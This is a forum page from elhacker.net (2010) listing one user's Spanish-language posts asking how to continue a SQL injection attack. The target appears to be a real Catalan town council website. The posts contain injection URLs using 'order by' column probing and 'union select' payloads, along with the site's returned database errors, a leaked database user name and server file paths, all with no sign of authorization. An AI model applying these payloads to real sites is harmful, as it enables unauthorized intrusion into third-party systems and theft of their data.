elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 2 [3]
21  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 21:28 pm
mmmmmmm en el fichero rss.php?

http://www.*******.info/rss.php?noticies=2%20union%20select%20user%28%29,2,3%20--bisbal@localhost



Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/usuaris/bisbal/php/categoria.php on line 127

Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/rss.php on line 27

Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/php/rss10.php on line 77
http://www.******.cat Les últimes notícies de l'Ajuntament http://www.******.cat/index.php?noticies=2&codi=376 PLE ORDINARI DEL 26 DE GENER DE 2010  http://www.********.cat/index.php?noticies=2&codi=374 PLE EXTRAORDINARI DEL DIA 21 DE GENER DE 2010 http://www.******.cat/index.php?noticies=2&codi=364 PLE ORDINARI DEL 27 DE GENER DE 2009 http://www.******.cat/index.php?noticies=2&codi=363 PLE ORDINARI DEL 30 DE JUNY DE 2009  http://www.*********.cat/index.php?noticies=2&codi=361 PLE ORDINARI DEL DIA 22 DE DESEMBRE DE 2009
22  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 21:18 pm
no tiene buscador............. buscando mas
23  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 21:12 pm
OK PROVANDO, y como dices tu es de esta gente si !!!
24  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 21:10 pm
No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc

mmmmmm
25  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 21:06 pm
De donde has cacado el codigo????
26  Seguridad Informática / Nivel Web / Re: Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 20:53 pm
Salu2, no se donde has sacado el codigo pero no es este intentare con blind sql, no se si me servirá......... si me puedes aportar algo mas me lo dices mil gracias
27  Seguridad Informática / Nivel Web / Ayuda como seguir con SQL Inyection en: 22 Marzo 2010, 20:08 pm
Salu2,

Tengo una página que he podido, por lo menos saber las columnas de su base de datos que tiene, está creada en php y core sobre Mysql:

http://www.lapaginaweb.com/index.php?contingut=2&codi=-1%20order%20by%205/*

Poniendo al final /* me deja ver que hay 5 porque si pongo 6 me peta.

El problema está seguir, he provado con:

-1+union+all+select 1,2,3,4,5/*

Y nada me da este error:

No s'ha pogut llegir select * from contingut where codi=-1 union all select 1,2,3,4,5/*

Alguien sabe como proseguir.... gracias para la ayuda a un newbaby!!!!!
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines